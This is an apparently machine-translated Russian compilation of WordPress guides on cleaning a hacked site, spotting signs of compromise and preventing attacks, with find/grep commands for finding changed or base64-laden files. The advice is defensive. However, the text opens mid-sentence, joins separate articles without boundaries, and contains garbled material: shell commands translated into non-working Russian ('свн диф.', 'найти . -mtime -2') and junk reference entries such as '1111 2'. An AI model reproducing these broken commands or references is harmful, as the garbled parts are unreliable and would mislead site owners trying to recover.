  • Четыре заражения вредоносным ПО начать сначала. В некоторых случаях это возможно, но во многих случаях это просто невозможно. Однако вы можете переустановить определенные элементы сайта, не затрагивая ядро ​​вашего сайта. Вы всегда хотите убедиться, что переустанавливаете ту же версию программного обеспечения, которую использует ваш веб-сайт, если вы выберете более старую или более новую версию, вы, вероятно, убьете свой веб-сайт. При переустановке не используйте параметры переустановки в файле WP-ADMIN. Используйте приложение FTP/SFTP для перетаскивания версий. Это окажется гораздо более эффективным в долгосрочной перспективе, поскольку эти установщики часто перезаписывают существующие файлы, а хакеры часто добавляют новые файлы… Вы можете безопасно заменить следующие каталоги:

    • /wp-admin
    • /wp-includes

    Отсюда рекомендуется более тщательно обновлять и заменять файлы при перемещении по wp-контенту, поскольку он содержит файлы вашей темы и плагинов.

    Единственный файл, который вам обязательно нужно посмотреть, это ваш файл .htaccess. Это один из наиболее распространенных файлов, независимо от типа заражения, который чаще всего обновляется и используется для гнусных действий. Этот файл часто находится в корне папки установки, но также может быть встроен в несколько других каталогов той же установки.

    Независимо от типа заражения, существуют некоторые общие файлы, за которыми нужно следить во время процесса исправления. К ним относятся:

    • index.php
    • header.php
    • footer.php
    • function.php

    При изменении эти файлы обычно могут негативно повлиять на все запросы страниц, что делает их мишенями для злоумышленников.

    Используйте возможности сообщества

    Мы часто забываем, что наша платформа основана на сообществе, а это значит, что если у вас возникнут проблемы, кто-то из сообщества, скорее всего, протянет вам руку помощи. Очень хорошим местом для начала, если вы ограничены в деньгах или просто ищете руку помощи, является форум WordPress.org Hacked or Malware.

    Обновление!

    После того, как вы очиститесь, вы должны обновить установку WordPress до последней версии программного обеспечения. Старые версии более подвержены взлому, чем новые версии.

    Снова смените пароли!

    Помните, что вам необходимо изменить пароли для вашего сайта после , чтобы убедиться, что ваш сайт чист. Поэтому, если вы изменили их только после того, как обнаружили взлом, измените их снова сейчас. Опять же, не забывайте использовать сложные, длинные и уникальные пароли.

    Вы можете изменить учетную запись пользователя и пароль базы данных. Когда вы изменили их, не забудьте добавить их в файл wp-config.php.

    Судебная экспертиза.

    Криминалистика — это процесс понимания того, что произошло. Как злоумышленники проникли внутрь? Цель состоит в том, чтобы понять вектор атаки, который использовал злоумышленник, чтобы гарантировать, что он не сможет снова злоупотребить им. Во многих случаях владельцам веб-сайтов очень сложно провести такой анализ из-за отсутствия технических знаний и/или доступных данных. Если у вас есть необходимые метаданные, есть такие инструменты, как OSSEC и splunk, которые могут помочь вам синтезировать данные.

    Защитите свой сайт.

    Теперь, когда вы успешно восстановили свой сайт, защитите его, применив некоторые (если не все) рекомендуемые меры безопасности.

    Не удается войти в панель администратора WordPress

    Бывают случаи, когда злоумышленники захватывают вашу учетную запись администратора. Это не повод для паники, есть несколько разных вещей, которые вы можете сделать, чтобы восстановить контроль над своей учетной записью. Вы можете выполнить следующие шаги, чтобы сбросить пароль

    Такие инструменты, как phpMyAdmin и Adminer, часто доступны через вашего хостинг-провайдера. Они позволяют вам напрямую войти в вашу базу данных, минуя ваш экран администрирования и сбрасывая вашего пользователя в таблице пользователей wp_users .

    Если вы не хотите возиться с хэшами паролей или не можете их понять, просто обновите адрес электронной почты и вернитесь на экран входа в систему, нажмите «Забыли пароль» и дождитесь письма.

    Используете систему контроля версий?

    Если вы используете контроль версий, может быть очень удобно быстро определить, что изменилось, и вернуться к предыдущей версии веб-сайта. Из терминала или командной строки вы можете сравнить свои файлы с версиями, хранящимися в официальном репозитории WordPress.

    $ свн диф.

    или сравните конкретный файл:

    $ SVN Diff/Path/TO/FILENAME

    TOP ↑

    • Взлом WordPress Backdoors (Ottopress)
    • WordPress Security — BS (SUSURI)
    • 1111 2
    • WordPress Security — BS (SUSURI)
    • 111111 2
    • WordPress Security — BS (SUSURI)
    • 11111119
    • WordPress Securit Почты (скоропортящиеся прессы)

    Как очистить взломанный сайт WordPress с помощью Wordfence

    Если ваш сайт взломан, не паникуйте.

    В этой статье описывается, как очистить ваш сайт, если он был взломан и заражен вредоносным кодом, бэкдорами, спамом, вредоносными программами или другими вредоносными программами. Эта статья была обновлена ​​в декабре 2021 г. и дополнена дополнительными ресурсами, которые помогут устранить определенные типы заражения. Эта статья написана Марком Маундером, основателем Wordfence. Я аккредитованный исследователь безопасности, CISSP, разработчик WordPress, а также исполнительный директор Defiant Inc, которая создает Wordfence. Даже если вы не используете WordPress, эта статья содержит несколько инструментов, которые вы можете использовать, чтобы очистить свой сайт от заражения.

    Если вы используете WordPress и вас взломали, вы можете использовать Wordfence для удаления большей части вредоносного кода с вашего сайта. Wordfence позволяет сравнивать ваши взломанные файлы с исходными файлами ядра WordPress и оригинальными копиями тем и плагинов WordPress в репозитории. Wordfence позволяет вам увидеть, что изменилось, и дает вам возможность восстановить или удалить файлы одним щелчком мыши.

    Если вы занятый владелец бизнеса и предпочитаете, чтобы наша опытная команда позаботилась о вашей проблеме, зарегистрируйтесь в Wordfence Care сейчас, затем щелкните ссылку «Получить помощь» на странице лицензий, чтобы немедленно открыть заявка на уборку сайта.

    Если у вас есть критически важный веб-сайт и его необходимо очистить немедленно или в нерабочее время, зарегистрируйтесь в Wordfence Response сейчас и откройте запрос на очистку сайта, и наша круглосуточная группа реагирования на инциденты начнет работу в течение 1 часа. . Они работают невероятно быстро и решат всю проблему в течение 24 часов. Как и в случае с Wordfence Care, после регистрации перейдите на страницу «Лицензии» и нажмите «Получить помощь» в своей лицензии, и вы попадете в приоритетную очередь для клиентов Response.

    Если вы хотите решить проблему самостоятельно или если Wordfence Care или Response выходит за рамки вашего бюджета, читайте дальше. МЫ МОЖЕМ СДЕЛАТЬ ЭТО!! Очистка вашего взломанного сайта — одна из причин, по которой я создал Wordfence, а бесплатная версия Wordfence включает в себя мощные инструменты, которые помогут вам очистить ваш сайт.

    Если вы подозреваете, что вас взломали, сначала убедитесь, что вас действительно взломали. Иногда администраторы сайтов в панике связываются с нами, думая, что их взломали, когда их сайт просто плохо себя ведет, обновление пошло не так или возникла какая-то другая проблема. Иногда владельцы сайтов могут видеть спам-комментарии и не могут отличить их от взлома.

    Ваш сайт был взломан, если:

    • В верхнем или нижнем колонтитуле вашего сайта появляется спам, который содержит рекламу таких вещей, как порнография, наркотики, нелегальные услуги и т. д. Часто он будет внедрен в содержимое вашей страницы без какой-либо мысли для представления, поэтому он может отображаться как темный текст на темном фоне и не быть очень заметным для человеческого глаза (но поисковые системы могут его видеть).
    • Вы выполняете поиск site:example.com (замените example.com на свой сайт) в Google и видите страницы или контент, который вы не узнаете и который выглядит вредоносным.
    • Вы получаете отчеты от своих пользователей о том, что они перенаправляются на вредоносный или спам-сайт. Обратите на это особое внимание, потому что многие взломщики обнаружат, что вы являетесь администратором сайта, и не покажут вам ничего спамного, а только покажут спам вашим посетителям или сканерам поисковых систем. Попробуйте использовать окно инкогнито при посещении своего сайта, а также посетить свой сайт из результатов поиска, а не вводить URL-адрес напрямую.
    • Вы получили отчет от своего хостинг-провайдера о том, что ваш веб-сайт использует вредоносные программы или спам. Например, если ваш хост сообщает вам, что он получает отчеты о спаме по электронной почте, который содержит ссылку на ваш веб-сайт, это может означать, что вас взломали. В этом случае злоумышленники рассылают откуда-то спам и используют ваш веб-сайт в качестве ссылки для перенаправления людей на принадлежащий им веб-сайт. Они делают это, потому что включение ссылки на ваш веб-сайт позволит избежать спам-фильтров, а включение ссылки на их собственный веб-сайт попадет в спам-фильтры.

    Wordfence обнаруживает многие из этих проблем, а также другие, которые я здесь не упомянул, поэтому следите за нашими предупреждениями и реагируйте соответствующим образом.

    Как только вы убедитесь, что вас взломали, немедленно создайте резервную копию своего сайта. Используйте FTP, систему резервного копирования вашего хостинг-провайдера или плагин для резервного копирования, чтобы загрузить копию всего вашего веб-сайта. Вы должны сделать это, потому что многие хостинг-провайдеры немедленно удалят весь ваш сайт, если вы сообщите, что он был взломан, или если они обнаружат вредоносный контент. Звучит безумно, верно? Но в некоторых случаях это стандартная процедура для предотвращения заражения других систем в их сети.

    Убедитесь, что вы также создали резервную копию базы данных веб-сайта. Резервное копирование ваших файлов и базы данных должно быть вашим главным приоритетом. Сделав это, вы можете смело переходить к следующему шагу очистки своего сайта, зная, что по крайней мере у вас есть копия вашего взломанного сайта, и вы не потеряете все.

    Вот правила очистки вашего сайта:

    • Обычно вы можете удалить что-либо в каталоге wp-content/plugins/, и вы не потеряете данные и не сломаете свой сайт. Это файлы плагинов, которые вы можете переустановить, поэтому вы не удаляете данные, которые не можете легко заменить. Когда вы удалите эти файлы, WordPress автоматически обнаружит, что вы удалили плагин, и отключит его. Так что это не приведет к сбою вашего сайта. Просто убедитесь, что вы удалили целые каталоги в wp-content/plugins, а не только отдельные файлы. Например, если вы хотите удалить плагин Wordfence, вы должны удалить wp-content/plugins/wordfence и все содержимое этого каталога, включая сам каталог. Если вы удалите только несколько файлов из плагина, вы можете оставить свой сайт неработоспособным.
    • Обычно у вас есть только один каталог тем, который используется для вашего сайта в каталоге wp-content/themes. Если вы знаете, какой это, вы можете удалить все другие каталоги тем. Имейте в виду, что если у вас есть «дочерняя тема», вы можете использовать два каталога в wp-content/themes . Это не обычная конфигурация.
    • В каталоги wp-admin и wp-includes очень редко добавляются новые файлы. Поэтому, если вы найдете что-то новое в этих каталогах, это, скорее всего, будет вредоносным.

    Следите за старыми установками и резервными копиями WordPress. Мы часто видим зараженные сайты, на которых кто-то говорит: «Но я поддерживал свой сайт в актуальном состоянии и у меня был установлен плагин безопасности, так почему меня взломали?» Иногда случается так, что вы или разработчик создаете резервную копию всех файлов вашего сайта в подкаталоге, таком как /old/, который доступен из Интернета. Эта резервная копия не поддерживается, и даже если ваш основной сайт защищен, злоумышленник может проникнуть на старый сайт, заразить его и получить доступ к вашему основному сайту через бэкдор, который они заложили. Так никогда не оставляйте старые установки WordPress лежать без дела, и если вас взломают, сначала проверьте их, потому что они, вероятно, полны вредоносных программ.

    Если у вас есть SSH-доступ к вашему серверу, войдите в систему и выполните следующую команду, чтобы увидеть все файлы, которые были изменены за последние 2 дня. Обратите внимание, что точка указывает на текущий каталог. Это заставит приведенную ниже команду искать в текущем каталоге и во всех подкаталогах недавно измененные файлы. Чтобы узнать, какой у вас текущий каталог при использовании SSH, введите «pwd» без кавычек и нажмите Enter.

    найти . -mtime -2 -ls

    Или вы можете указать конкретный каталог:

    find /home/yourdirectory/yoursite/ -mtime -2 -ls

    Или вы можете изменить поиск, чтобы показать файлы, измененные в последний раз 10 дней:

    find /home/yourdirectory/yoursite/ -mtime -10 -ls

    Мы предлагаем вам выполнить поиск выше и постепенно увеличивать количество дней, пока вы не начнете видеть измененные файлы. Если вы сами ничего не меняли с момента взлома, очень вероятно, что вы увидите файлы, которые изменил злоумышленник. Затем вы можете отредактировать или удалить их самостоятельно, чтобы очистить хак. Это, безусловно, самый эффективный и простой способ узнать, какие файлы были заражены, и он используется всеми профессиональными службами очистки сайтов.

    Еще один полезный инструмент SSH — grep. Например, для поиска файлов, которые ссылаются на кодировку base64 (обычно используемую хакерами), вы можете запустить следующую команду:

    grep -ril base64 *

    Это просто перечислит имена файлов. Вы можете опустить параметр «l», чтобы увидеть фактическое содержимое файла, в котором встречается строка base64:

    grep -ri base64 *

    Имейте в виду, что «base64» может встречаться и в законном коде. Прежде чем что-либо удалять, убедитесь, что вы не удаляете файл, который используется темой или плагином на вашем сайте. Более точный поиск мог бы выглядеть так:

    grep --include=*.php -rn . -e "base64_decode"

    Эта команда просматривает все каталоги и подкаталоги в поисках файлов, оканчивающихся на .php, и ищет в них текстовую строку «base64_decode» и выводит все найденные результаты, включая номер строки, чтобы вы могли легко найти, где это происходит в каждом файле.

    Теперь, когда вы знаете, как использовать grep, мы рекомендуем вам использовать grep в сочетании с find. Что вам нужно сделать, так это найти файлы, которые были недавно изменены, посмотреть, что было изменено в файле, и если вы найдете общую строку текста, например «Здесь был плохой хакер», вы можете просто найти этот текст во всех своих файлах следующим образом:

    grep -irl "Здесь был плохой хакер" *

    и это покажет вам все зараженные файлы, содержащие текст «Здесь был плохой хакер». Не забудьте звездочку (звездочку) в конце этой последней команды.

    Говорил вам, что мы можем это сделать! Я уверен, что на данный момент вы гораздо меньше беспокоитесь о своем взломанном сайте, теперь, когда у вас есть несколько инструментов для сортировки вредоносных файлов из вашей обычной установки WordPress.

    Пойдем еще глубже! Если вы очистите много зараженных сайтов, вы начнете замечать закономерности в тех местах, где чаще всего встречается вредоносный код. Одним из таких мест является каталог загрузки в установках WordPress. Приведенная ниже команда показывает, как найти все файлы в каталоге загрузки, которые не являются файлами изображений. Вывод сохраняется в файле журнала с именем «uploads-non-binary.log» в вашем текущем каталоге.

    find public_html/wp-content/uploads/ -type f -not -name "*.jpg" -not -name "*.png" -not -name "*.gif" -not -name "*.jpeg" " -not -name "*.webp" >uploads-non-binary.log

    Обратите внимание на путь к каталогу сразу после команды «find» выше. Мы предполагаем, что ваш текущий каталог является вашим домашним каталогом на вашем веб-сервере. Мы также предполагаем, что ваш веб-сайт находится в public_html/ непосредственно за этим путем к домашнему каталогу. Помните, что вы можете ввести «pwd», чтобы узнать, в каком каталоге вы сейчас находитесь. Вы также можете ввести «ls», чтобы просмотреть все файлы в текущем каталоге, или «ls -la», чтобы просмотреть файлы в текущем каталоге с дополнительными данными о них. каждый файл, такие как разрешения, владелец и время последнего изменения файла.

    Используя два простых инструмента командной строки «grep» и «find», вы часто можете очистить зараженный веб-сайт целиком. Как это легко! Могу поспорить, что вы уже готовы начать свой собственный бизнес по уборке сайтов.

    Теперь, когда в вашем арсенале есть несколько мощных инструментов и вы уже выполнили базовую очистку, давайте запустим Wordfence и запустим полное сканирование, чтобы очистить ваш сайт. Этот шаг важен, потому что Wordfence выполняет очень продвинутый поиск инфекций. Например:

    • Мы знаем, как должны выглядеть все основные файлы WordPress, темы с открытым исходным кодом и плагины с открытым исходным кодом, поэтому Wordfence может определить, заражен ли один из ваших исходных файлов, даже если это новая инфекция, которую никто никогда раньше не видел. Мы делаем это, сравнивая общедоступные исходные файлы с тем, что есть у вас, и помечая все изменения. На самом деле это одна из самых крутых функций в Wordfence, и она совершенно бесплатна!
    • Мы ищем индикаторы компрометации с помощью сложных регулярных выражений, которые мы называем «сигнатурами вредоносного ПО». Наши сигнатуры вредоносных программ постоянно обновляются на основе нашей базы данных известных заражений, и наши премиум-клиенты немедленно получают новейшие сигнатуры. Вы не можете сделать это с помощью простых инструментов командной строки Unix или cPanel. У нас лучшие сигнатуры вредоносного ПО в бизнесе!
    • Мы ищем в ваших файлах известные вредоносные доменные имена, которые обычно встречаются в файлах вредоносных программ и спама.
    • Мы используем SpamHaus, чтобы определить, использовался ли домен или IP-адрес вашего сайта для рассылки спама.
    • Сканирование Wordfence также предназначено для ОЧЕНЬ быстрой работы, учитывая объем работы, которое оно выполняет, и ищет именно вредоносное ПО для WordPress, в отличие от обычных сканеров.

    Чтобы очистить взломанный сайт с помощью Wordfence:

    1. Обновите свой сайт до последней версии WordPress. Это важно, потому что старые версии WordPress могут иметь неисправленные уязвимости.
    2. Обновите все свои темы и плагины до их новейших версий. То же самое относится и здесь. Разработчики постоянно устраняют уязвимости и проблемы безопасности в темах и плагинах, поэтому устанавливайте последнюю версию любой темы или плагина, которые вы используете.
    3. Сменить все пароли на сайте, особенно административные. Если пользователь или, что еще хуже, администратор повторно использовал пароль, возможно, именно так злоумышленник попал на ваш сайт, поэтому важно внести это изменение.
    4. Сделайте еще одну резервную копию и сохраните ее отдельно от резервной копии, которую мы рекомендовали сделать выше. Теперь у вас есть зараженный сайт, но на нем установлена ​​самая новая версия всего. Если вы что-то сломаете при очистке своего сайта с помощью Wordfence, вы можете вернуться к этой резервной копии, и вам не нужно повторять все шаги, описанные выше.
    5. Убедитесь, что у вас установлен Wordfence. Бесплатная версия подойдет, но версия Premium предоставит вам новейшие сигнатуры вредоносных программ и вредоносные домены.
    6. Перейдите в меню «Сканирование» Wordfence и просто нажмите «Начать сканирование». Это выполнит начальное сканирование и может дать вам много результатов, с которыми вам нужно будет работать. Каждый результат объяснит, что нашел Wordfence, и поможет вам решить эту проблему.
    7. После завершения сканирования и устранения проблем, обнаруженных Wordfence, можно выполнить еще более глубокое сканирование. Перейдите в меню «Все параметры» слева. Прокрутите примерно две трети пути вниз до заголовка «Основные параметры типа сканирования» и установите флажок, чтобы включить «Высокая чувствительность». Это приведет к гораздо более глубокому сканированию, которое займет немного больше времени, но это сканирование найдет действительно упрямое вредоносное ПО, которое труднее обнаружить и избавиться от него.
    8. Если вы хотите выполнить дополнительное сканирование, вы можете использовать страницу «Все параметры», чтобы настроить сканирование Wordfence в соответствии со своими потребностями. Сделайте столько сканирований, сколько хотите. Нет ограничений на количество сканирований, которые вы можете сделать, даже для наших бесплатных клиентов.
    9. Когда появятся результаты, вы увидите очень длинный список зараженных файлов. Не торопитесь и медленно проработайте список.
    10. Проверьте все подозрительные файлы и либо отредактируйте эти файлы вручную, чтобы очистить их, либо удалите файл. Помните, что вы не можете отменить удаление. Но пока вы сделали резервную копию, которую мы рекомендовали выше, вы всегда можете восстановить файл, если вы удалите что-то не то.
    11. Просмотрите все измененные файлы ядра, темы и плагинов. Используйте параметр Wordfence, чтобы увидеть, что изменилось между исходным файлом и вашим файлом. Если изменения выглядят вредоносными, используйте параметр Wordfence для восстановления файла.
    12. Медленно просматривайте список, пока он не станет пустым.
    13. Запустите еще одно сканирование и убедитесь, что ваш сайт чист.

    Если вам по-прежнему нужна помощь, вы можете подписаться на Wordfence Care для получения помощи в обычные рабочие часы или на Wordfence Response, если вы хотите получить круглосуточное обслуживание с ответом в течение 1 часа.

    Отправьте нам его по электронной почте по адресу [email protected], и мы сообщим вам. Если ваш файл конфигурации WordPress wp-config.php заражен, не отправляйте нам копию этого файла без предварительного удаления ваших учетных данных базы данных, а также уникальных ключей и солей аутентификации.

    Если вы не получили ответа, возможно, ваша или наша почтовая система отклонила сообщение, посчитав его вредоносным из-за вашего вложения. Поэтому, пожалуйста, напишите нам сообщение без вложений, сообщая нам, что вы пытаетесь отправить нам что-то, и мы будем работать с вами, чтобы получить образец.

    В Учебном центре Wordfence есть ряд статей, которые помогут вам. Вот список статей, которые помогут вам при определенных типах заражения:

    • Удаление вредоносных перенаправлений с вашего сайта
    • Поиск и удаление лазеек
    • Удаление спам-страниц с сайтов WordPress
    • Поиск и удаление спам-ссылок
    • Удаление фишинговых страниц с сайтов WordPress
    • Удаление вредоносного кода почтовой программы с вашего сайта
    • Поиск и удаление вредоносных программ загрузки файлов
    • Удаление дефейсной страницы WordPress
    • Как удалить подозрительный код с сайтов WordPress

    Вам необходимо удалить свой сайт из списка безопасного просмотра Google. Для этого вам нужно запросить обзор от Google. Вы можете найти подробные инструкции на этой странице в документации Google о том, как это сделать.

    Выход из списка Google Safe Browsing — это большой шаг, но вам, возможно, предстоит проделать определенную работу. Вам нужно вести список всех антивирусных продуктов, которые говорят, что ваш сайт заражен. Это могут быть такие продукты, как антивирус ESET, McAfee’s Web Advisor и другие.

    Посетите веб-сайт каждого производителя антивируса и найдите их инструкции по удалению вашего сайта из их списка опасных сайтов. Производители антивирусов часто называют это «белым списком», поэтому поиск в Google таких терминов, как «белый список», «удаление сайта», «ложное срабатывание» и названия продукта, как правило, приведет вас к месту, где вы можете удалить свой сайт.

    Перейдите по следующему URL-адресу и замените example.com адресом своего сайта.

    https://transparencyreport.google.com/safe-browsing/search?url=https://example. com/

    Вы можете включить подкаталог, если он есть на вашем сайте. Появляющаяся страница очень проста, но содержит подробную информацию о текущем статусе вашего сайта, почему он указан в списке безопасного просмотра Google и что делать дальше.

    Поздравляем!! Обязательно откройте свой любимый напиток и сделайте большой глоток! Теперь вам нужно убедиться, что ваш сайт больше не взломают. Вот как:

    • Установите Wordfence и регулярно сканируйте свой сайт WordPress.
    • Убедитесь, что WordPress и все плагины и темы обновлены. Это самое важное, что вы можете сделать для защиты своего сайта.
    • Убедитесь, что вы используете надежные пароли, которые трудно угадать.
    • Включить двухфакторную аутентификацию. Wordfence обеспечивает это даже в нашей бесплатной версии!
    • Избавьтесь от всех старых установок WordPress, лежащих на вашем сервере.
    • Подпишитесь на нашу рассылку по безопасности WordPress, чтобы получать уведомления о важных обновлениях безопасности, связанных с WordPress. Это список адресов электронной почты с низким трафиком и высоким соотношением сигнал-шум, ориентированный на безопасность WordPress.
    • Подключите свой сайт к Wordfence Central, чтобы упростить управление безопасностью вашего сайта. Central позволяет запускать сканирование на всех ваших сайтах WordPress одним щелчком мыши и легко управлять конфигурацией безопасности на всех ваших сайтах WordPress. Эффективное управление конфигурацией — чрезвычайно эффективный способ избежать взлома сайта.

    Спасибо, что прочитали это, и я надеюсь, что это помогло вам. Если нет, вы можете отметить @wordfence в Твиттере или отметить меня напрямую @mmaunder.

    Будьте в безопасности!!

    Марк Маундер — основатель Wordfence и генеральный директор Defiant Inc.

     

     

    Почему сайты WordPress взламывают и как это предотвратить

    Взлом — это процесс поиска уязвимостей в системе и их использования для обхода средств контроля безопасности. «Этические» хакеры используют этот процесс, чтобы узнать о системе и найти ее слабые места. Тем не менее, злонамеренный или «черный» взлом также распространен. Он часто используется для взлома веб-сайтов.

    Существует множество причин, по которым хакеры атакуют сайты WordPress. Одним из них является абсолютная популярность платформы. Зная эти причины, вы лучше поймете, как защитить свой сайт.

    В этой статье мы разберем причины, по которым люди взламывают веб-сайты. Затем мы поговорим о том, почему сам WordPress так сильно нагревается. Давайте поговорим о безопасности WordPress!

    Почему люди взламывают веб-сайты

    Каждый день взламываются тысячи веб-сайтов. Сайты WordPress составляют непропорционально большой процент этих сайтов, поскольку он поддерживает более 30% Интернета.

    Многие люди думают, что их сайты защищены от атак, потому что они не содержат ценной и конфиденциальной бизнес-информации. Однако существует множество других причин, по которым сайты взламывают, например:

    • для распространения вредоносных программ,
    • добавление полосы пропускания бот-сетям, которые часто используются для атак типа «отказ в обслуживании» (DDoS),
    • Черная поисковая оптимизация (SEO),
    • активизм / хактивизм,
    • просто для практики и развлечения.

    Дело в том, что ни один веб-сайт не защищен на 100% от возможности стать мишенью. Как только он появится в сети, он будет атакован.

    4 причины, по которым веб-сайты WordPress становятся мишенью

    Как будто всех причин, которые мы перечислили ранее, недостаточно, сайты WordPress привлекают дополнительное внимание злоумышленников. Давайте поговорим о том, почему это так.

    1. WordPress — самая популярная CMS

    Как мы упоминали ранее, на WordPress работает более 30% Интернета. По состоянию на 2018 год в Интернете насчитывалось более 1,5 миллиарда веб-сайтов (хотя не все они активны). Это означает, что чуть менее трети из них используют WordPress.

    В некоторых аспектах это отличная новость. Это означает, что разработка WordPress вряд ли остановится в ближайшее время, и у вас всегда будет отличное сообщество, которое поможет вам. Проблема в том, что эта же популярность также означает, что WordPress является эквивалентом джекпота для хакеров.

    Представьте на секунду, что кто-то нашел уязвимость в популярном плагине WordPress. Как уже случалось в прошлом, такой эксплойт может затронуть миллионы веб-сайтов. Конечно, сами плагины — не единственная проблема, что подводит нас к следующему пункту.

    2. Многие веб-сайты WordPress не имеют базовой защиты

    Есть много вещей, которые вы можете сделать, чтобы защитить свой веб-сайт от атак. Хорошая новость заключается в том, что многие передовые методы обеспечения безопасности не так сложны в реализации, как вы думаете.

    Нет двухфакторной аутентификации

    Использовать двухфакторную аутентификацию (2FA). Используя плагин двухфакторной аутентификации WordPress, это можно реализовать за считанные минуты. Кроме того, это значительно снижает вероятность того, что злоумышленники получат доступ к вашему сайту, даже если они украдут учетные данные пользователя.

    Не знакомы с 2FA? Обратитесь к нашему введению в двухфакторную аутентификацию для WordPress.

    Без усиления безопасности и защиты

    Точно так же установка и настройка плагина безопасности WordPress не займет много времени. Два наших фаворита, MalCare и Sucuri, включают в себя все виды функций, от брандмауэра до сканирования вредоносных программ.

    Нет записей и журналов активности

    Еще один простой метод обеспечения безопасности WordPress — вести журнал активности WordPress. Это позволяет вам отслеживать практически все, что происходит на вашем веб-сайте, от неудачных попыток входа в систему до изменений в файлах вашего сайта:

    Проблема в том, что большинство людей не тратят время на изучение основных мер безопасности WordPress. Они не считают, что их сайт находится в опасности. Если вы не хотите, чтобы ваш веб-сайт попал в статистику хакерских атак, внедрите приведенные выше рекомендации по безопасности.

    3. Использование слабых паролей широко распространено

    Когда дело доходит до обеспечения безопасности веб-сайта WordPress, пароли ваших пользователей WordPress являются первой линией защиты. Если кто-то угадает ваши учетные данные администратора, он получит полные права администратора на вашем веб-сайте, а это не очень хорошее место.

    Ситуация более неизбежна, чем вы думаете — пользователи всегда используют слабые пароли. Объясните своим пользователям, что такое надежный пароль. Например, сосредоточьтесь на длине, а не на сложном сочетании символов. Длинные пароли гораздо труднее угадать и взломать. И всегда используйте диспетчер паролей, чтобы вам и вашим пользователям не приходилось запоминать длинные пароли.

    Внедрение надежных политик паролей WordPress

    Точно так же целесообразно внедрить надежные политики паролей для пользователей вашего веб-сайта. Сделайте это с помощью плагина WPassword, который позволяет настроить срок действия пароля, историю паролей, сложность пароля и ряд других политик.

    Политики надежных паролей — это эффективный способ обеспечить безопасность вашего веб-сайта и научить посетителей использовать безопасные пароли.

    4. Использование устаревшего ядра WordPress, плагинов и другого программного обеспечения

    Довольно часто устаревшее программное обеспечение имеет уязвимости. Поэтому, когда администраторы WordPress используют устаревшее ядро, плагины, темы и другое программное обеспечение, они открывают дыры в безопасности, которые могут использовать хакеры. К сожалению, они делают это довольно часто; устаревшее уязвимое программное обеспечение является одной из наиболее распространенных причин взлома веб-сайтов WordPress.

    Злоумышленникам это известно. На самом деле у них есть множество бесплатных инструментов и скриптов для сканирования, которые они часто используют для массовой идентификации и эксплуатации уязвимых веб-сайтов WordPress.

    Подводя итоги

    WordPress невероятно популярен. Он прост в использовании, очень универсален, и с его помощью вы можете создавать потрясающие веб-сайты. Однако недостатком является то, что из-за этих положительных сторон WordPress становится мишенью для злонамеренных действий. Базовые методы обеспечения безопасности могут значительно смягчить этот негатив.

    Давайте вспомним четыре основные причины, по которым сайты WordPress так часто подвергаются атакам:

    1. Это самая популярная CMS в мире.
    2. Многие веб-сайты WordPress не соблюдают элементарные правила безопасности.
    3. Использование слабых паролей широко распространено.
    4. Часто используется устаревшее программное обеспечение.

    Как вы можете это остановить

    Чтобы закончить на позитивной ноте, вот несколько советов, которым вы должны следовать, чтобы противостоять вышеуказанным проблемам:

    1. Используйте брандмауэр веб-сайта WordPress / плагин безопасности,
    2. Установите плагин двухфакторной аутентификации (2FA),
    3. Ведите журнал всего, что происходит на вашем WordPress,
    4. Установите плагин для применения надежных политик паролей,
    5. Запустите монитор целостности файлов WordPress,
    6. Создайте резервную копию вашего веб-сайта WordPress.

    12 признаков того, что ваш сайт WordPress взломан (и как это исправить)

    Нас часто спрашивают, как проверить, не взломан ли мой сайт WordPress?

    Есть несколько общих контрольных признаков, которые могут помочь вам выяснить, взломан или скомпрометирован ваш WordPress.

    В этой статье мы расскажем о некоторых наиболее распространенных признаках того, что ваш сайт WordPress взломан, и о том, что вы можете сделать, чтобы его очистить.

    1. Внезапное падение посещаемости веб-сайта

    Если вы посмотрите на свои аналитические отчеты и увидите внезапное падение посещаемости, даже если Google Analytics настроен правильно, это может быть признаком того, что ваш сайт WordPress взломан.

    Внезапное падение трафика может быть вызвано разными факторами.

    Например, вредоносное ПО на вашем веб-сайте может перенаправлять незарегистрированных посетителей на спам-сайты.

    Другой возможной причиной внезапного падения трафика может быть то, что инструмент безопасного просмотра Google показывает пользователям предупреждения о вашем веб-сайте.

    Каждый день Google добавляет в черный список около 10 000 веб-сайтов на предмет наличия вредоносных программ и еще около тысячи на предмет фишинга. Вот почему каждый владелец веб-сайта должен уделять серьезное внимание безопасности своего WordPress.

    Вы можете проверить свой веб-сайт с помощью инструмента безопасного просмотра Google, чтобы просмотреть отчет о безопасности.

    2. На ваш сайт добавлены плохие ссылки

    Внедрение данных — один из наиболее распространенных признаков взлома WordPress. Хакеры создают бэкдор на вашем сайте WordPress, который дает им доступ для изменения файлов и базы данных WordPress.

    Некоторые из этих хаков добавляют ссылки на спам-сайты. Обычно эти ссылки добавляются в нижний колонтитул вашего сайта, но они могут быть где угодно. Удаление ссылок не гарантирует, что они не вернутся.

    Вам нужно будет найти и исправить бэкдор, используемый для внедрения этих данных на ваш сайт. Ознакомьтесь с нашим руководством о том, как найти и исправить бэкдор на взломанном сайте WordPress.

    3. Главная страница вашего веб-сайта испорчена

    Вероятно, это наиболее очевидная проблема, так как она хорошо видна на главной странице вашего веб-сайта.

    Большинство попыток взлома не искажают главную страницу вашего сайта, потому что они хотят оставаться незамеченными как можно дольше.

    Однако некоторые хакеры могут исказить ваш веб-сайт, чтобы объявить, что он был взломан. Такие хакеры обычно заменяют вашу домашнюю страницу своим сообщением. Некоторые могут даже пытаться вымогать деньги у владельцев сайтов.

    4. Вы не можете войти в WordPress

    Если вы не можете войти на свой сайт WordPress, возможно, хакеры удалили вашу учетную запись администратора из WordPress.

    Поскольку учетной записи не существует, вы не сможете сбросить пароль со страницы входа.

    Есть и другие способы добавить учетную запись администратора с помощью phpMyAdmin или через FTP. Однако ваш сайт останется небезопасным, пока вы не выясните, как хакеры проникли на ваш сайт.

    5. Подозрительные учетные записи пользователей в WordPress

    Если ваш сайт открыт для регистрации пользователей и вы не используете какую-либо защиту от регистрации спама, то спам-аккаунты – это обычный спам, который можно просто удалить.

    Однако, если вы не помните, разрешали ли регистрацию пользователей и по-прежнему видите новые учетные записи пользователей в WordPress, возможно, ваш сайт взломан.

    Обычно подозрительная учетная запись будет иметь роль администратора, и в некоторых случаях вы не сможете удалить ее из своей области администрирования WordPress.

    6. Неизвестные файлы и скрипты на вашем сервере

    Если вы используете подключаемый модуль сканера сайтов, такой как Sucuri, он предупредит вас, когда обнаружит неизвестный файл или скрипт на вашем сервере.

